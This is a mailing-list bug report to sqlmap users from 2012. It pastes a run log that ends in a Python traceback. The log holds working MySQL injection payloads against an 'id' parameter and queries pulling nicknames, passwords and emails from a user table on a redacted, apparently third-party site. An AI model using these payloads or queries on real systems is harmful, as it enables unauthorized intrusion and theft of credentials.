[sqlmap-users] Bug Found in sql-shell!
From: Marco M. <mm...@gm...> - 2012-04-04 20:19:07
[22:15:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[22:15:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12' AND 7690=7690 AND 'coUR'='coUR

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=12' UNION ALL SELECT NULL, CONCAT(0x3a6e617a3a,0x61476a577a7053536676,0x3a6f61623a)# AND 'vhgF'='vhgF

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12' AND SLEEP(5) AND 'oxZQ'='oxZQ
---

[22:15:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[22:15:51] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select nick, pws from utenti
[22:15:56] [INFO] fetching SQL SELECT statement query output: 'select nick, pws from utenti'
select nick, pws from utenti: 'None'

sql-shell> select nick, pws from utenti
[22:16:08] [INFO] fetching SQL SELECT statement query output: 'select nick, pws from utenti'
select nick, pws from utenti: 'None'

sql-shell> select nick, pws, mail from utenti
[22:16:32] [INFO] fetching SQL SELECT statement query output: 'select nick, pws, mail from utenti'
[22:16:32] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[22:16:32] [INFO] resumed: 4
the SQL query provided can return 4 entries. How many entries do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
> a
[22:16:36] [INFO] retrieving the length of query output

[22:16:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.2
Operating system: nt
Command line: P:\SQl INJECTION\sqlmap\sqlmap.py -u **************************************************** --sql-shell --threads=5
Technique: BOOLEAN
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "P:\SQl INJECTION\sqlmap\_sqlmap.py", line 82, in main
    start()
  File "P:\SQl INJECTION\sqlmap\lib\controller\controller.py", line 573, in start
    action()
  File "P:\SQl INJECTION\sqlmap\lib\controller\action.py", line 121, in action
    conf.dbmsHandler.sqlShell()
  File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line 2451, in sqlShell
    output = self.sqlQuery(query)
  File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line 2397, in sqlQuery
    output = inject.getValue(query, fromUser=True)
  File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 439, in getValue
    value = __goInferenceProxy(query, fromUser, expected, batch, unpack, charsetType, firstChar, lastChar, dump)
  File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 306, in __goInferenceProxy
    output = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
  File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 115, in __goInferenceFields
    output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump)
  File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 70, in __goInference
    _, length, _ = queryOutputLength(expression, payload)
  File "P:\SQl INJECTION\sqlmap\lib\utils\resume.py", line 74, in queryOutputLength
    count, length = bisection(payload, lengthExprUnescaped, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
TypeError: bisection() got an unexpected keyword argument 'expected'

[*] shutting down at 22:16:36